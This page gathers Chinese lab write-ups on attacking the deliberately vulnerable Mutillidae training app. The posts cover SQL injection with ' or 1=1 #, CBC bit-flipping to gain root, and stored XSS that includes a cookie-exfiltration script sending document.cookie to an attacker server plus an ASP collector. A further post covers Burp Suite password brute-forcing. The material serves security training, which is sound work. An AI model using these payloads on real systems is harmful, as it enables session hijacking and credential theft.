精华内容
下载资源
问答
  • mutillidae实战(1)  第一次接触这个平台,打算使用这个平台进行一些web渗透演练,以此来加深下自己对web安全的理解。今天主要是完成的环境的搭建和基础sql注入的尝试,后续将完成更多渗透测试。 mutillidae 在 ...

    mutillidae实战(1)

        第一次接触这个平台,打算使用这个平台进行一些web渗透演练,以此来加深下自己对web安全的理解。今天主要是完成的环境的搭建和基础sql注入的尝试,后续将完成更多渗透测试。

    mutillidae 在 windows7 下的安装

        这里使用的是windows7,并且已经安装了mysql了,在windows上,是需要再安装PHP的才能跑这个平台的,这里推荐PHPstudy。安装教程网上各种博客各种经验贴都有,按照mysql安装、phpstudy安装、mutillidae平台搭建这样的顺序即可。

        这里附上下载链接:

        mutillidae2.6.62    phpstudy    mysql

        下载完毕后,进行安全,先将mysql和phpstudy安装好,然后下载mutillidae,下载完毕后修改database-config.php文件,将里面的数据库用户名和密码替换成自己的。database-config.php文件路径为:mutillidae/includes/database-config.php。

        修改完毕后,将整个mutillidae文件夹复制到phpstudy网站根目录下。

        网站根目录查看方式:打开phpstudy,点击其他选项菜单,点击查看网站根目录

        将mutillidae整个复制到网站根目录下之后,即可在浏览器上访问该平台,输入127.0.0.1:80/mutillidae,在弹出的页面中点击reset databse,等待数据库载入后,页面弹出即为搭建成功。

    简单的sql注入尝试

        下面尝试下简单的sql注入,以此来检查下平台是否搭建成功。

        选择: 2017 A1 Extract Data-User info

        一打开是这样的界面,那么在这里就可以想到用SQL语句做文章了。

        

        首先看下是否能进行SQL注入,这里我是选择字用户名框输入一个“\”,点击确认键,可以看到报错信息,并且可以看到SQL语句,说明存在SQL注入,此处无过滤。

        与此同时,可以通过查看报错信息中的SQL语句,选择进行SQL注入的方式,这里可以看到这样的一行:

        

        那么,选择在用户名输入处输入“ or 1=1 #”,通过使用“or”字句将输入匹配取消,并使用“#”将后续语句中对password的查询给注释掉,即查询时的SQL语句变为了:

        SELECT * FROM account WHERE username=’’ or 1=1

        使用这个SQL语句,即可将account表中所有的用户信息查询出来。点击确认后,可以看到下方出现所有的用户信息:

        今天的工作就是这些,主要是平台的搭建和sql注入的简单尝试,后续将会进行其他web渗透演练,sql盲注、xss注入(存储型、反射型等)、html注入、命令注入、post/get等,总而言之,最大化的利用这个平台进行一些模拟演练,以此来提升自己。

        网络安全,还是要在做中学的。

        

        mutillidae实战(2)

    展开全文
  • 1.工作总结 时隔一个多月了,因为忙着保研所以没太多时间来写博客。... 使用CBC反转来实现用户权限的提升。...在burpsuite的安装中,这里我找了一个破解版的进行...mutillidae实战(2)-Add to blog存储型XSS漏洞利用

    1.工作总结

    时隔一个多月了,因为忙着保研所以没太多时间来写博客。今天介绍的是涉及到密码学的一个东西,挺有意思的,也算是对课堂上的内容进行了运用了吧。

    使用CBC反转来实现用户权限的提升。

    主要工作为三个:

    1. burpsuite安装;

    2. CBC反转权限提升。

    在burpsuite的安装中,这里我找了一个破解版的进行安装,且经过测试可以使用。

         安装全过程:https://blog.csdn.net/liuhuaijin/article/details/77768690

         破解版下载链接:https://www.jb51.net/softs/590164.html

    2.1 CBC反转简介

    这里根据之前学的一些密码学知识和今天的实践,总结下CBC反转的主要原理。

    2.1.1 CBC加密过程

    首先是CBC加密模式的加密过程:

    其中的各个量如下。

    Plaintext:待加密的数据

    IV:用于随机化加密的比特块,保证即使对相同明文多次加密,也可以得到不同的密文。

    Key:被一些如AES的对称加密算法使用。

    Ciphertext:加密后的数据。

    在这里重要的一点是,CBC工作于一个固定长度的比特组,将其称之为块。

    参照网上一篇博客的总结,可以将其概括为如下公式:

    Ciphertext-0 = Encrypt(Plaintext XOR IV)—只用于第一个组块Ciphertext-N= Encrypt(Plaintext XOR Ciphertext-N-1)—用于第二及剩下的组块

    从上面的公式和图来看,CBC模式最大的特点便是前一块的密文用来产生后一块的密文。

    而很显然,我们在反转过程中,也是需要利用CBC解密的原理的。

    2.1.2 CBC解密过程

    解密实际上是加密的一个逆运算,依旧是总结成一个公式:

    Plaintext-0 = Decrypt(Ciphertext) XOR IV—只用于第一个组块Plaintext-N= Decrypt(Ciphertext) XOR Ciphertext-N-1—用于第二及剩下的组块

    这里可以看到,Ciphertext-N-1(密文-N-1)是用来产生下一块明文;这就是字节翻转攻击开始发挥作用的地方。如果我们改变Ciphertext-N-1(密文-N-1)的一个字节,然后与下一个解密后的组块异或,我们就可以得到一个不同的明文了!也就是说,可以用下面这张图来概括下CBC反转攻击的过程:

    2.2 CBC字节反转攻击

    下面进行CBC反转攻击,先看到网页页面:

     

    这里大意就是,需要将用户ID和组ID都等于“000”才能成为root用户。

    先看下包里面有没有什么参数可以改,这里是可以使用burpsuite抓包的,但是这里用简单一点的,就不用burpsuite了,直接使用F12看就可以:

     

    这里可以看到,在get中有这样的一长串字符,除此之外便没有其他参数有可能和CBC有关了,所以可以尝试修改整个参数来看看页面内容是否变化,以检查是否是这个参数,这里的话可能是因为现在的mutillidae的安全等级比较低,所以在url处就有这样的iv参数,这里直接对这个参数进行修改即可检查。

    随意修改前两个字符试试,可以看到页面发生了变化:

    很显然,这里说明是存在CBC反转攻击漏洞的,那么下一步就是要找出那几位是影响User ID和Group ID的,然后对其进行CBC反转运算以实现攻击目标。

    采用一个字节一个字节(这里是16进制数,也就是说每两位便是一个字节)尝试的方法,经过几次尝试之后发现,第5个字节到第7个字节改变时User ID发生变化,第8到第10个字节发生改变时Group ID发生变化,于是下面我们对这几位进行修改以实现将UID和GID置为“000”。(此处其实可以直接根据下面的字符个数来判断,一个字符占一个字节,但是谨慎起见,建议还是按字节进行尝试)

    下一步进行CBC的反转,利用上述CBC反转介绍中的知识,实际上就是相连的三个异或操作,那么只要反推一下便可以得到“000”的密文了。

    根据页面上的提示,“1”的ASCALL码为0x31,“0”则为0x30,那么我们假设此时在User ID处“100”的加密密钥为key,“0”加密后的密文为M1,则可以列以下公式:

    key xor 0xab = 0x31

    key xor 0x30 = M

    可以解得M1=0xaa。

    同理反推出Group ID处M2=0x24。将其填入url中,可以看到以下页面,此处已经将UID和GID都置为了“000”,并且出现了“User is root”的提示,此时CBC反转攻击成功,用户权限提升:

     

    3.总结

    今天的CBC反转攻击算是密码学在web安全上的运用中比较基础的吧,能够直接在url上进行修改而不用抓包改包,也是让我觉得蛮意外的。另外也是第一次使用密码学来进行web攻击,通过这样一个比较基础的攻击尝试,也对密码学有了一些更加深入的理解和认识,难怪说密码学能够算得上是衡量国家国力的一个标准,毕竟能够有自主安全的密码算法的话,不仅数据安全能够有比较大的保障,一些重要的机构平台或者网络也是能够依靠密码算法来获得一个更加安全的运行环境的。

    而关于burpsuite,网上也有很多使用教程,后续我也会给出一些使用它来进行渗透的样例。

     

    mutillidae实战(1)-安装与简单的SQL注入

    mutillidae实战(2)-Add to blog存储型XSS漏洞利用

    展开全文
  • 该指导书对每个页面存在漏洞进行了详细分类,对OWASP Top 10 应用安全风险-2017中的漏洞举例说明,结合靶机使用还不错。
  • 今天主要完成了对Add to blog页面的存储型XSS漏洞利用,利用其完成cookie窃取及利用、网页插入两个简单操作。另外在窃取cookie时,完成了服务器端asp文件的部署...mutillidae实战(1)-安装与简单的SQL注入    

    今天主要完成了对Add to blog页面的存储型XSS漏洞利用,利用其完成cookie窃取及利用、网页插入两个简单操作。另外在窃取cookie时,完成了服务器端asp文件的部署,并且在盗取cookie后利用插件完成了身份伪造登录。

    难点主要在与服务器的搭建,在服务器搭建时,先是尝试了使用一个新加坡的vps进行cookie收集,但是因为ssh连接的问题始终没有成功,最后采用阿里云服务器成功部署。

    检查是否存在XSS漏洞

    一个很简单的发表博客的页面,可以看到这里未登陆的话默认用户名为“anonymous”。

    之前已经在这个页面上进行过SQL注入完成伪造其他用户进行日志新增的操作,现在在这个页面上继续寻找漏洞。先登录一个用户,这里登录之前在register中注册过的faker用户。

    可以看到,此时faker是博主,并且可以在这个页面添加blog了,添加一个内容为I am faker的博客, 并且点击Save Blog Entry进行保存,此时这篇博客I am faker会保存到后台数据库中,并且可以在下面查看到faker的博客。

    除此之外,还可以通过View Blogs来查看其它用户的博客,这里尝试查看下john的博客。

    这里就有文章可做了,根据所知道的,在浏览一个网页时,需要将这个网页加载下来,然后由浏览器进行描述,最后将这个网页展现在用户面前,那么假设某一个用户在建立博客时写入了一段Javascript脚本的内容,那么当其他用户查看这个用户的博客时,浏览器便可能会将这个Javascript脚本内容进行解释执行,这样也就是说,这个博客系统则存在一个XSS漏洞。 

    那么,现在尝试一下写入一段Javascript脚本,先再次新建一个用户test,然后使用这个用户在博客中写入一段Javascript脚本。

    这里选择插入的Javascript脚本为

    <script>alert(document.cookie);</script>

    如果在用户访问博客时,浏览器选择将这个脚本进行描述执行,那么使用这个脚本,可以将该用户的日志以alert的形式打印出来。

    点击添加博客,然后切换成faker用户来访问test的博客记录,可以看到,faker访问网站的cookie被打印了出来,也就是说在此处浏览器会将插入的Javascript脚本进行解释执行,此处存在一个存储型XSS漏洞:

    XSS漏洞利用

    检测出存在漏洞后,可以通过注入其他JavaScript脚本来实现其他功能。

    这里我尝试两个利用XSS漏洞的常见用法:

    1 cookie窃取及利用

    通过插入JavaScript脚本来窃取访问者的cookie

    这一步类似于之前的那个alert,但是在窃取中,需要将这个日志给传输到攻击者所拥有的服务器中,首先是服务器的部署,我在这里使用的是自己的阿里云服务器,新建一个cookie.asp文件,并将其放入服务器中,文件内容如下:

    <html>

    <title>xx</title>

    <body>

    <%testfile = Server.MapPath("code.txt")  //先构造一个路径,也就是取网站根目录,创造一个在根目录下的code.txt路径,保存在testfile中

    msg = Request("msg")  //获取提交过来的msg变量,也就是cookie值

    set fs = server.CreateObject("scripting.filesystemobject") //创建一个fs对象

    set thisfile = fs.OpenTextFile(testfile,8,True,0)

    thisfile.WriteLine(""&msg&"") //向code.txt中写入获取来的cookie

    thisfile.close()  //关闭

    set fs = nothing%>

    </body>

    </html>

    部署好服务器后,登录faker用户在blog中插入JavaScript脚本实现cookie盗取功能:

    这里使用的JavaScript脚本为:

    <script>window.open('http://(IP)/cookie.asp?msg='+document.cookie)</script>

    该脚本实现读取访问日志,并且将其发送到指定的位置中。

    点击Sava进行博客的提交,然后使用test用户来查看这个博客,然后登录服务器查看code.txt文件,可以看到test此次访问的cookie已经被盗取:

    接下来,可以通过使用Tamper Data插件,使用Start Tamper抓取登录信息,并在途中的cookie一栏中将其替换成抓取到的cookie,以此来实现test用户的登录。

    2  网页插入

    通过插入脚本插入其他网页。

    这个应用比较复杂,可以通过插入语句以实现跳转到其他网页,也可以直接修改当前页以盗取信息,这里进行一个比较简单的操作,主要是在博客中插入超链接实现将博客内容改为百度首页,登录faker用户编辑博客内容为:

    <iframe src="https://www.baidu.com" />

    通过插入这条博客,可以将用户访问的博客内容修改为百度搜索首页,点击Save后使用test访问faker的博客内容:

    心得体会

    之前挖了三个SQL,现在尝试下存储型XSS。实际上两者都是通过恶意代码的注入来实现攻击者对后台或者浏览器的一些攻击。从名字也能看出,XSS表示Cross Site Scripting(跨站脚本攻击),与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在XSS攻击中,则是通过插入恶意脚本,实现对用户游览器的控制。

    经过今天的挖洞,也简单总结下存储型XSS攻击的基本流程:

    a. 黑客在留言板或者博客内插入恶意的html或者Javascript代码,并且提交;

    b. 网站后台程序将留言内容存储在数据中;

    c. 其他用户访问这个论坛,并刷新了留言板,这时网站后台从数据库中读取了之前黑客的留言内容,并且直接插入在html页面中,导致黑客留言的脚本被浏览器解释执行,此时可能出现以下情况:

    cookie被窃取;

    重定向网站到一个钓鱼网站;

    页面内容被更改,让客户输入用户名,密码,然后提交到黑客的服务器。

     

    mutillidae实战(1)-安装与简单的SQL注入

     

     

    展开全文
  • mutillidae实战(4)-burpsuite爆破登录

    千次阅读 2018-11-10 21:33:15
    使用burpsuite做了几个ctf题目,其中有获取base64解码后post的,也有直接抓包改包的,因为昨天有同学问到在mutillidae中进行爆破登录,所以今天也抓要对其进行一下爆破,做个记录。这里我之前已经安装好了burp...

    题外话:更多关于网络安全、信息技术、CTF方面的东西,可以参考我的博客,也许你能找到你想看的?

    https://www.xiaozzz.xyz/

    一、本日工作总结

    使用burpsuite做了几个ctf题目,其中有获取base64解码后post的,也有直接抓包改包的,因为昨天有同学问到在mutillidae中进行爆破登录,所以今天也抓要对其进行一下爆破,做个记录。这里我之前已经安装好了burpsuite了,所以就直接进入正题,所完成的工作主要有:

    1. 设置burpsuite,使用burpsuite抓包;
    2. 已知账号,对密码进行爆破;
    3. 信息未知,对账号和密码进行爆破。

    二、burpsuite爆破过程

    2.1 使用burpsuite抓包

    2.1.1配置浏览器代理

    我这里使用的是火狐浏览器,直接用火狐本身的代理,设置过程如下:

    选项  --->  网络代理  --->  设置

    2.1.2导入证书

    然后是证书导入:

    先下载证书,在firefox的url栏输入  http://burp

    点击 CA Certificate 下载证书,下载完成后导入证书。

    选项  --->  隐私与安全  --->  查看证书  --->  导入

    选择刚刚下载的证书导入其中。

    导入完成后,火狐浏览器的设置就完成了,接下来使用burpsuite进行抓包,抓取登录界面的包。

    2.1.3 burpsuite抓包

    在Proxy--Intersept页面,将Intersept设置为on。

    打开登录页面,随意输入用户名和密码后点击登录。

    打开burpsuite,可以在burpsuite中看到抓取的数据包:

    2.2 密码爆破

    下面进行密码爆破,这里假设的是已经用户名,需要爆破出密码,则我们再次抓包,在之前的实验中,已经知道平台中是有admin这一账户的,那么此时在用户名处输入admin,在密码处随意输入,点击登录,查看burpsuite抓取的包。

     

    开始爆破,查看Intercept之后,将拦截到的请求,右键点击Send to Intruder。

    在Introder中,点击Clear将自动设置的爆破点清除,然后在将请求中选定password后点击 add ,将其添加为爆破点。

     

    设置完成后,点击payload,然后点击load来加载字典。

     

    这里使用的是从网上下载的一个弱口令字典,大概有几千条,其中包含有一些常见的弱口令。

    加载完字典后点击Start attack,开始爆破:

     

    等待爆破完成,在这个时候也可以去查看是否有已经爆破出来的密码,看到有这样一条:

     

    那么很显然,虽然因为字典条数过多,并没有爆破完,但是这个明显就是admin的密码了,尝试登录一下:

    登录成功,即密码爆破成功!

     

    2.3 账号密码爆破

    下面进行账号和密码的爆破。这一过程与前面的密码爆破区别不大,主要区别在于需要设定两个payload,并且时间比起单纯的密码爆破会长很多。

    首先依旧是抓包,随意输入账号和密码:

    将其发送至Intruder,然后设定username和password两个爆破点,并且设置攻击类型为Cluser Bumb:

    设定payload,分别选择payload set 1和payload set 2,并添加user_name和user_pw的载荷,也就是添加账号和密码的爆破字典。这里使用的也是网上下载的字典,账号的字典条数较小,只有一百多条,密码的字典为之前密码爆破使用的字典。

    选择好payload后,为了加快速度,在Options处设置了一下线程的数量为10,然后点击stack开始爆破:

    果不其然,的确很慢......慢得电脑发热了,等了很久才出来一条:

     

     

    明显和密码爆破中的结果是一样的,所以也就不用验证了,肯定是可以登录的,爆破成功!

    三、心得体会

    果不其然,爆破就是慢得出奇,如果不是电脑很好或者说只用用GPU之类的设备的话,最好还是老老实实的啃技术慢慢渗透吧,毕竟爆破这东西虽然不太需要技术,但是对于设备的需求还是很高的。

    另外就是对于字典的选择方面,我这个是从网上下载的字典,并且对其进行了拆分(因为这个字典原来是用在GPU上跑的...很大...),拆分了很多次之后才有了现在的十几kb几千条的,其实也是运气好,能够爆破出来,特别是账号密码一起爆破的时候。就拿两个10kb、1000条的字典来说,假设单独跑密码是3分钟,那么密码和账号一起跑便是10kb分钟,算了下差不多能够跑到下个星期了......

    一个比较简单的尝试吧,实际上重点在于如何应用burpsuite完成爆破这一问题上,也看了下昨天那个同学的问题在哪,实际上就是对burpsuite爆破的使用上存在问题,另外就是payload的设置,估计也有字典的因素吧,如果运气不好的话,没准字典里面并没有账号和密码字符......那肯定是跑不出来的。

    burpsuite及注册机下载

     

     

    mutillidae实战(1)-安装与简单的SQL注入

    mutillidae实战(2)-Add to blog存储型XSS漏洞利用

    mutillidae实战(3)-CBC反转提权

    展开全文
  • mutillidae实战(1) 第一次接触这个平台,打算使用这个平台进行一些web渗透演练,以此来加深下自己 对web安全的理解。今天主要是完成的环境的搭建和基础sql注入的尝试,后续将完成更多渗透测试。 这里使用的是...
  • 先查看网页。这里大意就是,需要将用户ID和组ID都等于“000”才能成为root用户。...某个博主:mutillidae实战(3)-CBC反转提权 https://blog.csdn.net/weixin_41177699/article/details/83063101
  • http://127.0.0.1/mutillidae/index.php?page=register.php 1、注册一个用户试一试,发现页面只提示用户注册成功信息,并五其它可回显信息,果断尝试盲注和报错 尝试布尔型盲注,并没有效果,,,试试时间型盲注,...
  • 实战靶场整理

    千次阅读 2020-07-22 10:35:41
    在学习渗透测试的过程中,光学理论知识是不够的,还需要结合实战来进行学习。但是国家法律是不允许我们对互联网上的web站在未授权的情况下进行渗透测试的,所以我们只能通过自己搭建环境来进行学习。下面给大家分享...
  • http://www.codegreen.cn1. 安装前环境准备 系统环境:[root@zbserver~]#uname-r 2.6.32-504.el6.x86_64 [root@zbserver~]#uname-m x86_64 [root@zbserver~]#cat/etc/redhat-release CentOSrelease6.6(Fin...
  • burpsuite使用教程和实战详解(一)

    千次阅读 2018-12-26 10:55:00
    3、其实之前已经做过很多渗透测试的实战,但是很多经验和遇到的问题,会发现随着时间的推移会忘记,所以不断地要往回复习。此次将之前的关于burpsuite的东西做一次详细的整理。 如何配置和下载破解pro版的burp...
  • MSF学习笔记——实战篇(一)MSF学习笔记——实战篇(一)一、信息收集(一)db_nmap(二)Auxiliary模块1.arp扫描2.端口扫描3.空闲扫描4.UDP扫描5.密码嗅探6.SNMP扫描(161端口)6.SMB扫描(445端口)7.SSH扫描(22端口)8....
  • 文章目录1 Metasploitable2使用指南2 服务3 易受攻击的web服务3.1 易受攻击的web服务:Mutillidae3.2 易被攻击的web服务:DVWA 1 Metasploitable2使用指南 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统...
  • 全!CTF靶场、渗透实战靶场总结 (适合收藏)

    千次阅读 多人点赞 2021-05-20 15:38:25
    CTF靶场、渗透实战靶场总结 (适合收藏) CTF靶场:CTF刷题,在校生备战CTF比赛,信安入门、提升自己、丰富简历之必备(一场比赛打出好成绩,可以让你轻松进大厂,如近期的美团杯); 渗透实战靶场:挖洞、渗透实战...
  • Mutillidae、DVWA等 VirtualBox安装方法查看下面文章 渗透利器--最新版kali2020系统安装(超详细) Metasploitable2 虚拟系统下载地址: https://sourceforge.net/projects/metasploitable/ 实战 VirtualBox加载...
  • sqlmap -u "http://192.168.119.167/mutillidae/index.php?page=user-info.php&username=asas&password=asasa&user-info-php-submit-button=View+Account+Details" --batch -D nowasp --tables 3. 获取表中指定的...
  • (续)渗透测试靶机实战---系统篇04 12.vsftpd Compromised Source Packages Backdoor Vulnerability msf5 > search vsftpd Matching Modules ================ # Name Disclos...
  • location.href= "http://10.1.64.35/mutillidae/robots.txt" </script> 这里结合了一些社会工程的思路,例如,通过网站内部私信的方式将其发给其他用户。如果其他用户点击并且相信了这个信息,则可能在另外的站点...
  • mutillidae是一个免费,开源的Web应用程序,提供专门被允许的安全测试和***的Web应用程序。它是由Adrian “Irongeek” Crenshaw和Jeremy “webpwnized” Druin.开发的一款自由和开放源码的Web应用程序。其中包含了...
  • 练习hacker站

    2016-12-30 18:08:26
    进攻即是最好的防御,这句话同样适用于信息...实战演练以 Web 题为主,包含基础关、脚本关、注入关、上传关、解密关、综合关等。 地址: http://hackinglab.cn/index.php 参考来源: ...
  • 链接地址:http://sourceforge.net/projects/mutillidae SQLol SQLol是一个可配置得SQL注入测试平台,它包含了一系列的挑战任务,让你在挑战中测试和学习SQL注入语句。此程序在Austin黑客会议上由Spider Labs发布。...
  • 网络攻防网站

    2019-10-03 17:27:33
    )的应用程序,比如在 Web 应用方面预装了如下平台: mutillidae (NOWASP Mutillidae 2.1.19) dvwa (Damn Vulnerable Web Application) phpMyAdmin tikiwiki (TWiki) tikiwiki-old dav (WebDav) 系统软件的漏洞(二...
  • 实战nmap端口扫描 先进行一次主机发现,使用-sn选项对探索子网内活跃的主机。 我们发现10.0.2.10这个IP地址的主机是活跃的 接着使用基本的端口扫描功能对OWASP靶机进行扫描,这里使用TCP SYN扫描 TCP ...
  • 进攻即是最好的防御,这句话同样适用于信息安全的世界。这里罗列了19个合法的来练习黑客...实战演练以 Web 题为主,包含基础关、脚本关、注入关、上传关、解密关、综合关等。 网络安全实验室|网络信息安全攻防学习平台
  • 安全学习入坑指南

    2019-01-19 17:53:43
    渗透测试与靶机:Kali Linux、DVWA / Mutillidae / Webgoat 信息搜集:扫描引擎(Google / Shadan)、目标扫描(Nmap、OpenVAS)、域名/目录爆破(DirBuster、御剑) 漏洞扫描:BurpSuite、AWVS、Appscan XSS / CSRF...
  • SQL注入攻击

    2020-04-06 14:05:08
    SQL注入流程 判断是否有sql注入漏洞 判断操作系统,数据库,web应用类型 获取数据库信息,包括管理员信息及拖库 加密信息破解,sqlmap可自动破解 提升权限,获得sql-shell,os-shell,登录应用后台 手动注入实战 基于...
  • 该项目包括以下内容: -Hacme Bank -HacmeBank for Android -HacmeBooks -HacmeCasino -HacmeShipping -HacmeTravel 9.Mutillidae Mutillidae专为Linux和Windows平台设计,它同样是一个包含大量安全漏洞的Web应用。...

空空如也

空空如也

1 2 3
收藏数 59
精华内容 23
关键字:

mutillidae实战